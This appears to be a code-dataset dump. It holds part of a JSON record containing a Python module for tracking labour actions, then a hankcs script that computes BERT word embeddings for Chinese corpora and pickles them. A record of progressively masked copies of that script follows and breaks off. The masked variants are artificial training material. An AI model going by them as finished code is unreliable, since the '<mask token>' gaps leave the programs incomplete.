action: Action):\n \"\"\" Append an action onto this instance of Actions. \"\"\"\n self.actions.append(action)\n\n def to_df(self) ->pd.DataFrame:\n \"\"\" Converts this instance of Actions to a df. \"\"\"\n data = []\n for action in self.actions:\n data.append(action.to_df())\n df = pd.read_json(json.dumps(data), orient='list')\n return df[self.fields]\n\n def to_md(self):\n \"\"\" Convert this instance of Actions to markdown/HTML. \"\"\"\n soup = BeautifulSoup(f'<div id={self.action_id}></div>', 'html.parser')\n for action in self.actions:\n table = soup.new_tag('table')\n soup.div.append(table)\n for meta_field in Action._meta_fields:\n table[meta_field] = action.__getattribute__(meta_field)\n for field in self.fields:\n if action.__getattribute__(field) is None:\n continue\n if field in Action._meta_fields:\n continue\n tr = soup.new_tag('tr')\n td_key = soup.new_tag('td', attrs={'class': 'field-key'})\n td_val = soup.new_tag('td', attrs={'class': 'field-value'})\n td_key.string = field\n td_val = action.to_md(field, td_val)\n tr.append(td_key)\n tr.append(td_val)\n table.append(tr)\n return soup.prettify()\n\n @classmethod\n def read_from_md(cls, md_doc: MarkdownDocument) ->'Actions':\n \"\"\" Create and populate an Actions instance from a Markdown Document. \"\"\"\n md_data = re.findall(f'<div id=\"{cls.action_id}\">+[\\\\s\\\\S]+<\\\\/div>',\n md_doc)\n assert len(md_data\n ) == 1, f'multiple divs with id={cls.action_id} were found'\n md_data = md_data[0]\n soup = BeautifulSoup(md_data, 'html.parser')\n tables = soup.div.find_all('table')\n actions = Actions()\n for table in tables:\n action = Action.create_from_md(table)\n actions.append(action)\n return actions\n\n @staticmethod\n def read_from_df(df: pd.DataFrame) ->'Actions':\n \"\"\" Create and populate an Actions instance from a dataframe. \"\"\"\n actions = Actions()\n for i, row in df.iterrows():\n action = Action.create_from_row(row)\n actions.append(action)\n return actions\n",
"step-5": "import pandas as pd\nimport math\nimport json\nimport html\nimport bs4\nimport re\nimport dateparser\nfrom bs4 import BeautifulSoup\nfrom dataclasses import dataclass, field\nfrom datetime import datetime\nfrom typing import Any, List, Dict, ClassVar, Union\nfrom urllib.parse import urlparse\nfrom .markdown import MarkdownData, MarkdownDocument\n\nUrl = str\n\n\n@dataclass\nclass Action:\n \"\"\" The class for an action we want to track.\n\n This class is used to manage the data of an individual Action. It is used\n to perform the following:\n - set mandatory/optional fields\n - set meta fields\n - cast an validate data so that it knows how to read datafields from\n markdown and dataframes\n - output actions as for dataframes and markdown\n - create and populate action instances from markdown and dataframes\n \"\"\"\n\n date: str\n sources: List[Url]\n action: str\n struggles: List[str]\n description: str\n\n locations: List[str] = None\n companies: List[str] = None\n workers: int = None\n tags: List[str] = None\n author: str = None\n\n _meta_fields: ClassVar = [\"author\"]\n\n _valid_struggles: ClassVar = [\n \"ethics\",\n \"pay_and_benefits\",\n \"working_conditions\",\n \"discrimination\",\n \"unfair_labor_practices\",\n \"job_security\",\n ]\n\n _valid_actions: ClassVar = [\n \"strike\",\n \"protest\",\n \"open_letter\",\n \"legal_action\",\n \"union_drive\",\n \"union_representation\",\n ]\n\n @staticmethod\n def is_none(field: Any) -> bool:\n if field is None:\n return True\n elif isinstance(field, float) and math.isnan(field):\n return True\n elif isinstance(field, str) and field.lower() == \"none\":\n return True\n elif isinstance(field, (list,)) and len(field) == 0:\n return True\n else:\n return False\n\n def listify(self, field: Union[List[Any], Any]) -> List[Any]:\n if self.is_none(field):\n return None\n else:\n if isinstance(field, (list,)):\n return field\n else:\n return [s.strip().lower() for s in field.split(\",\")]\n\n def __post_init__(self):\n \"\"\" Used to validate fields. \"\"\"\n # self.date = datetime.strptime(self.date, \"%Y-%m-%d\").date()\n self.date = dateparser.parse(self.date).date()\n self.sources = self.listify(self.sources)\n self.struggles = self.listify(self.struggles)\n self.action = self.action.strip().lower()\n\n self.companies = self.listify(self.companies)\n self.tags = self.listify(self.tags)\n self.locations = self.listify(self.locations)\n\n self.workers = None if self.is_none(self.workers) else int(self.workers)\n\n # make sure action is a valid action\n assert (\n self.action in self._valid_actions\n ), f\"'{self.action}' is not a valid input. Valid inputs are: {self._valid_actions}\"\n\n # make sure all struggles are valid struggles\n for struggle in self.struggles:\n assert (\n struggle in self._valid_struggles\n ), f\"'{struggle}' is not a valid input. Valid inputs are: {self._valid_struggles}\"\n\n # make sure source is either a url or a html link tag <a>\n for source in self.sources:\n assert (\n BeautifulSoup(source, \"html.parser\").a is not None\n or urlparse(source).netloc is not \"\"\n ), f\"'{source}' is in valid. source must be a valid url or an html link tag element\"\n\n # if html, extract only href from sources\n self.sources = [\n BeautifulSoup(source, \"html.parser\").a[\"href\"]\n if \"href\" in source\n else source\n for source in self.sources\n ]\n\n def __lt__(self, other):\n \"\"\" Used to make Actions sortable. \"\"\"\n return self.date < other.date\n\n def __eq__(self, other):\n \"\"\" Overrides the default implementation for equality. \"\"\"\n if isinstance(other, Action):\n return self.__dict__.items() == other.__dict__.items()\n return False\n\n def to_df(self) -> Dict[str, Any]:\n \"\"\" Return dict of all fields serialized to string \"\"\"\n return {key: self.render_df(key) for key, value in self.__dict__.items()}\n\n def render_df(self, field: str) -> str:\n \"\"\" Return the value of the field rendered for df. \"\"\"\n value = self.__getattribute__(field)\n if field in [\"date\", \"workers\"]:\n return str(value)\n elif field in [\"locations\", \"struggles\", \"companies\", \"tags\", \"sources\"]:\n return str(value).strip(\"[\").strip(\"]\").replace(\"'\", \"\").replace('\"', \"\")\n else:\n return value\n\n def to_md(self, field: str, td: bs4.element.Tag) -> str:\n \"\"\" Convert field for markdown\n\n Takes a td BeautifulSoup object and updates it according to the field\n type so that it renders correctly in markdown.\n \"\"\"\n assert (\n field in self.__dataclass_fields__\n ), f\"Cannot serialize {field}. Not a valid field in Action.\"\n\n value = self.__getattribute__(field)\n\n if field in [\"date\", \"workers\"]:\n td.string = str(value)\n elif field in [\"locations\", \"struggles\", \"companies\", \"tags\"]:\n td.string = (\n str(value).strip(\"[\").strip(\"]\").replace(\"'\", \"\").replace('\"', \"\")\n )\n elif field == \"sources\":\n ret = []\n for source in value:\n tag = (\n f\"<a href='{source}' target='_blank'>{urlparse(source).netloc}</a>\"\n )\n ret.append(tag)\n td.append(BeautifulSoup(html.unescape(\", \".join(ret)), \"html.parser\"))\n else:\n td.string = value\n\n return td\n\n @classmethod\n def create_from_md(cls, table: bs4.element.Tag) -> \"Action\":\n \"\"\" Create an Action instance from a md table. \"\"\"\n a = {}\n trs = table.find_all(\"tr\")\n for key, val in table.attrs.items():\n if key != \"class\":\n a[key] = val\n for i, tr in enumerate(trs):\n td_key = tr.find(\"td\", class_=\"field-key\")\n td_val = tr.find(\"td\", class_=\"field-value\")\n val = \"\".join(str(e) for e in td_val.contents).strip()\n key = \"\".join(str(e) for e in td_key.contents).strip()\n a[key] = val\n return cls(**a)\n\n @classmethod\n def create_from_row(cls, row: pd.Series) -> \"Action\":\n \"\"\" Create an Action instance from a dataframe row. \"\"\"\n fields = [\n key\n for key, value in cls.__dataclass_fields__.items()\n if value.type != ClassVar\n ]\n d = {key: value for key, value in row.to_dict().items() if key in fields}\n return cls(**d)\n\n\n@dataclass\nclass Actions:\n \"\"\" The class for a set of actions.\n\n This class is a collection of actions. It is used to for the four primary\n usecases:\n - to serialize the list of actions into a dataframe\n - to serialize the list of actions into a markdown/html table\n - to create and populate an Actions instance from a dataframe\n - to create and populate an Actions instance from a markdown document\n \"\"\"\n\n action_id: ClassVar = \"actions\"\n actions: List[Action] = field(default_factory=lambda: [])\n fields: List[str] = field(\n default_factory=lambda: [\n key\n for key, value in Action.__dataclass_fields__.items()\n if value.type != ClassVar\n ]\n )\n\n def __len__(self) -> int:\n \"\"\" Get the number of actions. \"\"\"\n return len(self.actions)\n\n def __eq__(self, other):\n \"\"\" Overrides the default implementation for equality. \"\"\"\n if isinstance(other, Actions):\n return self.actions == other.actions\n return False\n\n def sort(self, *args, **kwargs) -> \"Actions\":\n \"\"\" Sorts the list of actions. \"\"\"\n self.actions.sort(*args, **kwargs)\n return self\n\n def append(self, action: Action):\n \"\"\" Append an action onto this instance of Actions. \"\"\"\n self.actions.append(action)\n\n def to_df(self) -> pd.DataFrame:\n \"\"\" Converts this instance of Actions to a df. \"\"\"\n data = []\n for action in self.actions:\n data.append(action.to_df())\n df = pd.read_json(json.dumps(data), orient=\"list\")\n return df[self.fields]\n\n def to_md(self):\n \"\"\" Convert this instance of Actions to markdown/HTML. \"\"\"\n soup = BeautifulSoup(f\"<div id={self.action_id}></div>\", \"html.parser\")\n for action in self.actions:\n table = soup.new_tag(\"table\")\n soup.div.append(table)\n for meta_field in Action._meta_fields:\n table[meta_field] = action.__getattribute__(meta_field)\n for field in self.fields:\n if action.__getattribute__(field) is None:\n continue\n if field in Action._meta_fields:\n continue\n tr = soup.new_tag(\"tr\")\n td_key = soup.new_tag(\"td\", attrs={\"class\": \"field-key\"})\n td_val = soup.new_tag(\"td\", attrs={\"class\": \"field-value\"})\n td_key.string = field\n td_val = action.to_md(field, td_val)\n tr.append(td_key)\n tr.append(td_val)\n table.append(tr)\n return soup.prettify()\n\n @classmethod\n def read_from_md(cls, md_doc: MarkdownDocument) -> \"Actions\":\n \"\"\" Create and populate an Actions instance from a Markdown Document. \"\"\"\n md_data = re.findall(fr'<div id=\"{cls.action_id}\">+[\\s\\S]+<\\/div>', md_doc)\n assert len(md_data) == 1, f\"multiple divs with id={cls.action_id} were found\"\n md_data = md_data[0]\n soup = BeautifulSoup(md_data, \"html.parser\")\n tables = soup.div.find_all(\"table\")\n actions = Actions()\n for table in tables:\n action = Action.create_from_md(table)\n actions.append(action)\n return actions\n\n @staticmethod\n def read_from_df(df: pd.DataFrame) -> \"Actions\":\n \"\"\" Create and populate an Actions instance from a dataframe. \"\"\"\n actions = Actions()\n for i, row in df.iterrows():\n action = Action.create_from_row(row)\n actions.append(action)\n return actions\n",
"step-ids": [
10,
13,
19,
23,
25
]
}
|
[
10,
13,
19,
23,
25
] |
# -*- coding:utf-8 -*-
# Author: hankcs
# Date: 2019-01-13 15:01
import pickle
import numpy as np
from bert_serving.client import BertClient
from pyhanlp import *
CharTable = JClass('com.hankcs.hanlp.dictionary.other.CharTable')
# bc = BertClient(ip='192.168.1.88') # ip address of the server
bc = BertClient(ip='127.0.0.1') # ip address of the GPU machine
def embed_last_token(text):
result = bc.encode(text, show_tokens=True)
# print(result)
batch = []
for sent, tensor, tokens in zip(text, result[0], result[1]):
valid = []
tid = 0
buffer = ''
words = sent.lower().split()
for i, t in enumerate(tokens):
if t == '[CLS]' or t == '[SEP]':
continue
else:
if t.startswith('##'):
t = t[2:]
elif t == '[UNK]':
t = words[tid][len(buffer)]
buffer += t
if buffer == words[tid]:
valid.append(i)
buffer = ''
tid += 1
# print(len(valid))
# exit()
if len(valid) != len(sent.split()) or tid != len(words):
print(valid)
print(sent.split())
print(result[1])
batch.append(tensor[valid, :])
return batch
def embed_sum(text):
result = bc.encode(text, show_tokens=True)
# print(result)
batch = []
for sent, tensor, tokens in zip(text, result[0], result[1]):
token_tensor = []
sent_tensor = []
tid = 0
buffer = ''
words = sent.lower().split()
for i, t in enumerate(tokens):
if t == '[CLS]' or t == '[SEP]':
continue
else:
if t.startswith('##'):
t = t[2:]
elif t == '[UNK]':
t = words[tid][len(buffer)]
buffer += t
token_tensor.append(tensor[i, :])
if buffer == words[tid]:
sent_tensor.append(np.stack(token_tensor).mean(axis=0))
token_tensor = []
buffer = ''
tid += 1
# print(len(valid))
# exit()
if tid != len(words) or len(sent_tensor) != len(words):
print(sent.split())
print(tokens)
exit()
batch.append(np.stack(sent_tensor))
return batch
def generate_bert(path, output, embed_fun=embed_sum):
print(output)
total = 0
with open(path) as src:
batch = []
tensor = []
for line in src:
line = line.strip()
if len(line) == 0:
continue
batch.append(CharTable.convert(line).replace('—', '-')
.replace('‘', '\'')
.replace('…', '.')
.replace('坜', '壢')
.replace('唛', '麦')
.replace('ㄅㄆㄇㄈ', '呀呀')
.replace('’', '\''))
if len(batch) and len(batch) % 100 == 0:
tensor.extend(embed_fun(batch))
total += len(batch)
print(total)
batch = []
if len(batch):
tensor.extend(embed_fun(batch))
total += len(batch)
print(total)
with open(output, 'wb') as f:
pickle.dump(tensor, f)
if __name__ == '__main__':
# generate_bert('data/SemEval-2016/news.test.sent.txt', 'data/SemEval-2016/news.test.bert', embed_fun=embed_sum)
# generate_bert('data/SemEval-2016/news.valid.sent.txt', 'data/SemEval-2016/news.valid.bert', embed_fun=embed_sum)
# generate_bert('data/SemEval-2016/news.train.sent.txt', 'data/SemEval-2016/news.train.bert', embed_fun=embed_sum)
#
# generate_bert('data/SemEval-2016/text.test.sent.txt', 'data/SemEval-2016/text.test.bert', embed_fun=embed_sum)
# generate_bert('data/SemEval-2016/text.valid.sent.txt', 'data/SemEval-2016/text.valid.bert', embed_fun=embed_sum)
# generate_bert('data/SemEval-2016/text.train.sent.txt', 'data/SemEval-2016/text.train.bert', embed_fun=embed_sum)
generate_bert('data/semeval15/cz.pas.dev.sent.txt', 'data/embedding/bert_base_sum/cz.pas.dev.bert',
embed_fun=embed_sum)
generate_bert('data/semeval15/cz.pas.train.sent.txt', 'data/embedding/bert_base_sum/cz.pas.train.bert',
embed_fun=embed_sum)
generate_bert('data/semeval15/cz.id.pas.sent.txt', 'data/embedding/bert_base_sum/cz.id.pas.bert',
embed_fun=embed_sum)
# generate_bert('data/ctb5.1-pos/dev.short.sent.txt', 'data/embedding/bert_base_sum/ctb.pos.dev.bert',
# embed_fun=embed_sum)
# generate_bert('data/ctb5.1-pos/test.short.sent.txt', 'data/embedding/bert_base_sum/ctb.pos.test.bert',
# embed_fun=embed_sum)
# generate_bert('data/ctb5.1-pos/train.short.sent.txt', 'data/embedding/bert_base_sum/ctb.pos.train.bert',
# embed_fun=embed_sum)
# generate_bert('data/msra/dev.short.sent.txt', 'data/embedding/bert_base_sum/msra.dev.bert',
# embed_fun=embed_sum)
# generate_bert('data/msra/test.short.sent.txt', 'data/embedding/bert_base_sum/msra.test.bert',
# embed_fun=embed_sum)
# generate_bert('data/msra/train.short.sent.txt', 'data/embedding/bert_base_sum/msra.train.bert',
# embed_fun=embed_sum)
# generate_bert('data/msra/test.auto.short.sent.txt', 'data/embedding/bert_base_sum/msra.test.auto.bert',
# embed_fun=embed_sum)
# generate_bert('data/msra/test.auto.short.sent.txt', 'data/embedding/bert_base_sum/msra.test.auto.bert',
# embed_fun=embed_sum)
# generate_bert('data/msra/dev.auto.short.sent.txt', 'data/embedding/bert_base_sum/msra.dev.auto.bert',
# embed_fun=embed_sum)
# generate_bert('data/msra/train.auto.short.sent.txt', 'data/embedding/bert_base_sum/msra.train.auto.bert',
# embed_fun=embed_sum)
# generate_bert('data/ctb5/dev.sent.txt', 'data/embedding/bert_base_sum/ctb.dev.bert',
# embed_fun=embed_sum)
# generate_bert('data/ctb5/test.sent.txt', 'data/embedding/bert_base_sum/ctb.test.bert',
# embed_fun=embed_sum)
# generate_bert('data/ctb5/train.sent.txt', 'data/embedding/bert_base_sum/ctb.train.bert',
# embed_fun=embed_sum)
|
normal
|
{
"blob_id": "38e167630519b73bffea4ff527bc7b7272a49f1a",
"index": 348,
"step-1": "<mask token>\n\n\ndef embed_last_token(text):\n result = bc.encode(text, show_tokens=True)\n batch = []\n for sent, tensor, tokens in zip(text, result[0], result[1]):\n valid = []\n tid = 0\n buffer = ''\n words = sent.lower().split()\n for i, t in enumerate(tokens):\n if t == '[CLS]' or t == '[SEP]':\n continue\n else:\n if t.startswith('##'):\n t = t[2:]\n elif t == '[UNK]':\n t = words[tid][len(buffer)]\n buffer += t\n if buffer == words[tid]:\n valid.append(i)\n buffer = ''\n tid += 1\n if len(valid) != len(sent.split()) or tid != len(words):\n print(valid)\n print(sent.split())\n print(result[1])\n batch.append(tensor[valid, :])\n return batch\n\n\ndef embed_sum(text):\n result = bc.encode(text, show_tokens=True)\n batch = []\n for sent, tensor, tokens in zip(text, result[0], result[1]):\n token_tensor = []\n sent_tensor = []\n tid = 0\n buffer = ''\n words = sent.lower().split()\n for i, t in enumerate(tokens):\n if t == '[CLS]' or t == '[SEP]':\n continue\n else:\n if t.startswith('##'):\n t = t[2:]\n elif t == '[UNK]':\n t = words[tid][len(buffer)]\n buffer += t\n token_tensor.append(tensor[i, :])\n if buffer == words[tid]:\n sent_tensor.append(np.stack(token_tensor).mean(axis=0))\n token_tensor = []\n buffer = ''\n tid += 1\n if tid != len(words) or len(sent_tensor) != len(words):\n print(sent.split())\n print(tokens)\n exit()\n batch.append(np.stack(sent_tensor))\n return batch\n\n\ndef generate_bert(path, output, embed_fun=embed_sum):\n print(output)\n total = 0\n with open(path) as src:\n batch = []\n tensor = []\n for line in src:\n line = line.strip()\n if len(line) == 0:\n continue\n batch.append(CharTable.convert(line).replace('—', '-').replace(\n '‘', \"'\").replace('…', '.').replace('坜', '壢').replace('唛',\n '麦').replace('ㄅㄆㄇㄈ', '呀呀').replace('’', \"'\"))\n if len(batch) and len(batch) % 100 == 0:\n tensor.extend(embed_fun(batch))\n total += len(batch)\n print(total)\n batch = []\n if len(batch):\n tensor.extend(embed_fun(batch))\n total += len(batch)\n print(total)\n with open(output, 'wb') as f:\n pickle.dump(tensor, f)\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef embed_last_token(text):\n result = bc.encode(text, show_tokens=True)\n batch = []\n for sent, tensor, tokens in zip(text, result[0], result[1]):\n valid = []\n tid = 0\n buffer = ''\n words = sent.lower().split()\n for i, t in enumerate(tokens):\n if t == '[CLS]' or t == '[SEP]':\n continue\n else:\n if t.startswith('##'):\n t = t[2:]\n elif t == '[UNK]':\n t = words[tid][len(buffer)]\n buffer += t\n if buffer == words[tid]:\n valid.append(i)\n buffer = ''\n tid += 1\n if len(valid) != len(sent.split()) or tid != len(words):\n print(valid)\n print(sent.split())\n print(result[1])\n batch.append(tensor[valid, :])\n return batch\n\n\ndef embed_sum(text):\n result = bc.encode(text, show_tokens=True)\n batch = []\n for sent, tensor, tokens in zip(text, result[0], result[1]):\n token_tensor = []\n sent_tensor = []\n tid = 0\n buffer = ''\n words = sent.lower().split()\n for i, t in enumerate(tokens):\n if t == '[CLS]' or t == '[SEP]':\n continue\n else:\n if t.startswith('##'):\n t = t[2:]\n elif t == '[UNK]':\n t = words[tid][len(buffer)]\n buffer += t\n token_tensor.append(tensor[i, :])\n if buffer == words[tid]:\n sent_tensor.append(np.stack(token_tensor).mean(axis=0))\n token_tensor = []\n buffer = ''\n tid += 1\n if tid != len(words) or len(sent_tensor) != len(words):\n print(sent.split())\n print(tokens)\n exit()\n batch.append(np.stack(sent_tensor))\n return batch\n\n\ndef generate_bert(path, output, embed_fun=embed_sum):\n print(output)\n total = 0\n with open(path) as src:\n batch = []\n tensor = []\n for line in src:\n line = line.strip()\n if len(line) == 0:\n continue\n batch.append(CharTable.convert(line).replace('—', '-').replace(\n '‘', \"'\").replace('…', '.').replace('坜', '壢').replace('唛',\n '麦').replace('ㄅㄆㄇㄈ', '呀呀').replace('’', \"'\"))\n if len(batch) and len(batch) % 100 == 0:\n tensor.extend(embed_fun(batch))\n total += len(batch)\n print(total)\n batch = []\n if len(batch):\n tensor.extend(embed_fun(batch))\n total += len(batch)\n print(total)\n with open(output, 'wb') as f:\n pickle.dump(tensor, f)\n\n\nif __name__ == '__main__':\n generate_bert('data/semeval15/cz.pas.dev.sent.txt',\n 'data/embedding/bert_base_sum/cz.pas.dev.bert', embed_fun=embed_sum)\n generate_bert('data/semeval15/cz.pas.train.sent.txt',\n 'data/embedding/bert_base_sum/cz.pas.train.bert', embed_fun=embed_sum)\n generate_bert('data/semeval15/cz.id.pas.sent.txt',\n 'data/embedding/bert_base_sum/cz.id.pas.bert', embed_fun=embed_sum)\n",
"step-3": "<mask token>\nCharTable = JClass('com.hankcs.hanlp.dictionary.other.CharTable')\nbc = BertClient(ip='127.0.0.1')\n\n\ndef embed_last_token(text):\n result = bc.encode(text, show_tokens=True)\n batch = []\n for sent, tensor, tokens in zip(text, result[0], result[1]):\n valid = []\n tid = 0\n buffer = ''\n words = sent.lower().split()\n for i, t in enumerate(tokens):\n if t == '[CLS]' or t == '[SEP]':\n continue\n else:\n if t.startswith('##'):\n t = t[2:]\n elif t == '[UNK]':\n t = words[tid][len(buffer)]\n buffer += t\n if buffer == words[tid]:\n valid.append(i)\n buffer = ''\n tid += 1\n if len(valid) != len(sent.split()) or tid != len(words):\n print(valid)\n print(sent.split())\n print(result[1])\n batch.append(tensor[valid, :])\n return batch\n\n\ndef embed_sum(text):\n result = bc.encode(text, show_tokens=True)\n batch = []\n for sent, tensor, tokens in zip(text, result[0], result[1]):\n token_tensor = []\n sent_tensor = []\n tid = 0\n buffer = ''\n words = sent.lower().split()\n for i, t in enumerate(tokens):\n if t == '[CLS]' or t == '[SEP]':\n continue\n else:\n if t.startswith('##'):\n t = t[2:]\n elif t == '[UNK]':\n t = words[tid][len(buffer)]\n buffer += t\n token_tensor.append(tensor[i, :])\n if buffer == words[tid]:\n sent_tensor.append(np.stack(token_tensor).mean(axis=0))\n token_tensor = []\n buffer = ''\n tid += 1\n if tid != len(words) or len(sent_tensor) != len(words):\n print(sent.split())\n print(tokens)\n exit()\n batch.append(np.stack(sent_tensor))\n return batch\n\n\ndef generate_bert(path, output, embed_fun=embed_sum):\n print(output)\n total = 0\n with open(path) as src:\n batch = []\n tensor = []\n for line in src:\n line = line.strip()\n if len(line) == 0:\n continue\n batch.append(CharTable.convert(line).replace('—', '-').replace(\n '‘', \"'\").replace('…', '.').replace('坜', '壢').replace('唛',\n '麦').replace('ㄅㄆㄇㄈ', '呀呀').replace('’', \"'\"))\n if len(batch) and len(batch) % 100 == 0:\n tensor.extend(embed_fun(batch))\n total += len(batch)\n print(total)\n batch = []\n if len(batch):\n tensor.extend(embed_fun(batch))\n total += len(batch)\n print(total)\n with open(output, 'wb') as f:\n pickle.dump(tensor, f)\n\n\nif __name__ == '__main__':\n generate_bert('data/semeval15/cz.pas.dev.sent.txt',\n 'data/embedding/bert_base_sum/cz.pas.dev.bert', embed_fun=embed_sum)\n generate_bert('data/semeval15/cz.pas.train.sent.txt',\n 'data/embedding/bert_base_sum/cz.pas.train.bert', embed_fun=embed_sum)\n generate_bert('data/semeval15/cz.id.pas.sent.txt',\n 'data/embedding/bert_base_sum/cz.id.pas.bert', embed_fun=embed_sum)\n",
"step-4": "import pickle\nimport numpy as np\nfrom bert_serving.client import BertClient\nfrom pyhanlp import *\nCharTable = JClass('com.hankcs.hanlp.dictionary.other.CharTable')\nbc = BertClient(ip='127.0.0.1')\n\n\ndef embed_last_token(text):\n result = bc.encode(text, show_tokens=True)\n batch = []\n for sent, tensor, tokens in zip(text, result[0], result[1]):\n valid = []\n tid = 0\n buffer = ''\n words = sent.lower().split()\n for i, t in enumerate(tokens):\n if t == '[CLS]' or t == '[SEP]':\n continue\n else:\n if t.startswith('##'):\n t = t[2:]\n elif t == '[UNK]':\n t = words[tid][len(buffer)]\n buffer += t\n if buffer == words[tid]:\n valid.append(i)\n buffer = ''\n tid += 1\n if len(valid) != len(sent.split()) or tid != len(words):\n print(valid)\n print(sent.split())\n print(result[1])\n batch.append(tensor[valid, :])\n return batch\n\n\ndef embed_sum(text):\n result = bc.encode(text, show_tokens=True)\n batch = []\n for sent, tensor, tokens in zip(text, result[0], result[1]):\n token_tensor = []\n sent_tensor = []\n tid = 0\n buffer = ''\n words = sent.lower().split()\n for i, t in enumerate(tokens):\n if t == '[CLS]' or t == '[SEP]':\n continue\n else:\n if t.startswith('##'):\n t = t[2:]\n elif t == '[UNK]':\n t = words[tid][len(buffer)]\n buffer += t\n token_tensor.append(tensor[i, :])\n if buffer == words[tid]:\n sent_tensor.append(np.stack(token_tensor).mean(axis=0))\n token_tensor = []\n buffer = ''\n tid += 1\n if tid != len(words) or len(sent_tensor) != len(words):\n print(sent.split())\n print(tokens)\n exit()\n batch.append(np.stack(sent_tensor))\n return batch\n\n\ndef generate_bert(path, output, embed_fun=embed_sum):\n print(output)\n total = 0\n with open(path) as src:\n batch = []\n tensor = []\n for line in src:\n line = line.strip()\n if len(line) == 0:\n continue\n batch.append(CharTable.convert(line).replace('—', '-').replace(\n '‘', \"'\").replace('…', '.').replace('坜', '壢').replace('唛',\n '麦').replace('ㄅㄆㄇㄈ', '呀呀').replace('’', \"'\"))\n if len(batch) and len(batch) % 100 == 0:\n tensor.extend(embed_fun(batch))\n total += len(batch)\n print(total)\n batch = []\n if len(batch):\n tensor.extend(embed_fun(batch))\n total += len(batch)\n print(total)\n with open(output, 'wb') as f:\n pickle.dump(tensor, f)\n\n\nif __name__ == '__main__':\n generate_bert('data/semeval15/cz.pas.dev.sent.txt',\n 'data/embedding/bert_base_sum/cz.pas.dev.bert', embed_fun=embed_sum)\n generate_bert('data/semeval15/cz.pas.train.sent.txt',\n 'data/embedding/bert_base_sum/cz.pas.train.bert', embed_fun=embed_sum)\n generate_bert('data/semeval15/cz.id.pas.sent.txt',\n 'data/embedding/bert_base_sum/cz.id.pas.bert', embed_fun=embed_sum)\n",
"step-5": "# -*- coding:utf-8 -*-\n# Author: hankcs\n# Date: 2019-01-13 15:01\nimport pickle\n\nimport numpy as np\nfrom bert_serving.client import BertClient\nfrom pyhanlp import *\n\nCharTable = JClass('com.hankcs.hanlp.dictionary.other.CharTable')\n\n# bc = BertClient(ip='192.168.1.88') # ip address of the server\nbc = BertClient(ip='127.0.0.1') # ip address of the GPU machine\n\n\ndef embed_last_token(text):\n result = bc.encode(text, show_tokens=True)\n # print(result)\n batch = []\n for sent, tensor, tokens in zip(text, result[0], result[1]):\n valid = []\n tid = 0\n buffer = ''\n words = sent.lower().split()\n for i, t in enumerate(tokens):\n if t == '[CLS]' or t == '[SEP]':\n continue\n else:\n if t.startswith('##'):\n t = t[2:]\n elif t == '[UNK]':\n t = words[tid][len(buffer)]\n buffer += t\n if buffer == words[tid]:\n valid.append(i)\n buffer = ''\n tid += 1\n # print(len(valid))\n # exit()\n if len(valid) != len(sent.split()) or tid != len(words):\n print(valid)\n print(sent.split())\n print(result[1])\n batch.append(tensor[valid, :])\n return batch\n\n\ndef embed_sum(text):\n result = bc.encode(text, show_tokens=True)\n # print(result)\n batch = []\n for sent, tensor, tokens in zip(text, result[0], result[1]):\n token_tensor = []\n sent_tensor = []\n tid = 0\n buffer = ''\n words = sent.lower().split()\n for i, t in enumerate(tokens):\n if t == '[CLS]' or t == '[SEP]':\n continue\n else:\n if t.startswith('##'):\n t = t[2:]\n elif t == '[UNK]':\n t = words[tid][len(buffer)]\n buffer += t\n token_tensor.append(tensor[i, :])\n if buffer == words[tid]:\n sent_tensor.append(np.stack(token_tensor).mean(axis=0))\n token_tensor = []\n buffer = ''\n tid += 1\n # print(len(valid))\n # exit()\n if tid != len(words) or len(sent_tensor) != len(words):\n print(sent.split())\n print(tokens)\n exit()\n batch.append(np.stack(sent_tensor))\n return batch\n\n\ndef generate_bert(path, output, embed_fun=embed_sum):\n print(output)\n total = 0\n with open(path) as src:\n batch = []\n tensor = []\n for line in src:\n line = line.strip()\n if len(line) == 0:\n continue\n batch.append(CharTable.convert(line).replace('—', '-')\n .replace('‘', '\\'')\n .replace('…', '.')\n .replace('坜', '壢')\n .replace('唛', '麦')\n .replace('ㄅㄆㄇㄈ', '呀呀')\n .replace('’', '\\''))\n if len(batch) and len(batch) % 100 == 0:\n tensor.extend(embed_fun(batch))\n total += len(batch)\n print(total)\n batch = []\n if len(batch):\n tensor.extend(embed_fun(batch))\n total += len(batch)\n print(total)\n with open(output, 'wb') as f:\n pickle.dump(tensor, f)\n\n\nif __name__ == '__main__':\n # generate_bert('data/SemEval-2016/news.test.sent.txt', 'data/SemEval-2016/news.test.bert', embed_fun=embed_sum)\n # generate_bert('data/SemEval-2016/news.valid.sent.txt', 'data/SemEval-2016/news.valid.bert', embed_fun=embed_sum)\n # generate_bert('data/SemEval-2016/news.train.sent.txt', 'data/SemEval-2016/news.train.bert', embed_fun=embed_sum)\n #\n # generate_bert('data/SemEval-2016/text.test.sent.txt', 'data/SemEval-2016/text.test.bert', embed_fun=embed_sum)\n # generate_bert('data/SemEval-2016/text.valid.sent.txt', 'data/SemEval-2016/text.valid.bert', embed_fun=embed_sum)\n # generate_bert('data/SemEval-2016/text.train.sent.txt', 'data/SemEval-2016/text.train.bert', embed_fun=embed_sum)\n\n generate_bert('data/semeval15/cz.pas.dev.sent.txt', 'data/embedding/bert_base_sum/cz.pas.dev.bert',\n embed_fun=embed_sum)\n generate_bert('data/semeval15/cz.pas.train.sent.txt', 'data/embedding/bert_base_sum/cz.pas.train.bert',\n embed_fun=embed_sum)\n generate_bert('data/semeval15/cz.id.pas.sent.txt', 'data/embedding/bert_base_sum/cz.id.pas.bert',\n embed_fun=embed_sum)\n\n # generate_bert('data/ctb5.1-pos/dev.short.sent.txt', 'data/embedding/bert_base_sum/ctb.pos.dev.bert',\n # embed_fun=embed_sum)\n # generate_bert('data/ctb5.1-pos/test.short.sent.txt', 'data/embedding/bert_base_sum/ctb.pos.test.bert',\n # embed_fun=embed_sum)\n # generate_bert('data/ctb5.1-pos/train.short.sent.txt', 'data/embedding/bert_base_sum/ctb.pos.train.bert',\n # embed_fun=embed_sum)\n\n # generate_bert('data/msra/dev.short.sent.txt', 'data/embedding/bert_base_sum/msra.dev.bert',\n # embed_fun=embed_sum)\n # generate_bert('data/msra/test.short.sent.txt', 'data/embedding/bert_base_sum/msra.test.bert',\n # embed_fun=embed_sum)\n # generate_bert('data/msra/train.short.sent.txt', 'data/embedding/bert_base_sum/msra.train.bert',\n # embed_fun=embed_sum)\n # generate_bert('data/msra/test.auto.short.sent.txt', 'data/embedding/bert_base_sum/msra.test.auto.bert',\n # embed_fun=embed_sum)\n\n # generate_bert('data/msra/test.auto.short.sent.txt', 